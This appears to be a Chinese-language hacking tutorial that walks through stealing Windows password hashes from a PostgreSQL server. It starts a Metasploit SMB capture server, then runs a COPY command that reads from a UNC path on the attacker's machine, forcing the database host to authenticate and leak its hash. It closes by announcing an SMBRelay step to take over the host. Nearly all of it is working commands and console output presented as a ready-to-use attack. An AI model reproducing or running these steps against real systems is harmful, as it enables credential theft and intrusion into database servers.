前面说了MYSQL的,现在来说postgres ,只需要是postgres数据库用户就能成功的进行攻击,老样子先构造个SMB SERVER。
看数据库的启动权限是默认的:
恩,不用注入点了,搭建环境费时间,
msf > use auxiliary
/server/capture/smb
msf auxiliary(smb) > exploit
[*] Auxiliary module execution completed
[*] Server started.
msf auxiliary(smb) >
下面来链接PG数据库
root@Dis9Team:~
# psql -h 192.1.1.130 -U postgres
用户 postgres 的口令:
psql (8.4.9, 服务器 8.3.17)
警告:psql 版本8.4, 服务器版本8.3.
一些psql功能可能无法工作.
输入
"help"
来获取帮助信息.
postgres=
#
用老方法读本地伪造的共享,我们就能获得HASH
CREATE
TABLE
sb(sb text);
COPY sb(sb)
FROM
'\\\\192.1.1.129\\hacked.txt'
;
看控制台
而METASPLOIT的模块成功获得了HASH
下面我们直接来获得权限 用MSF的SMBRelay模块在读一次。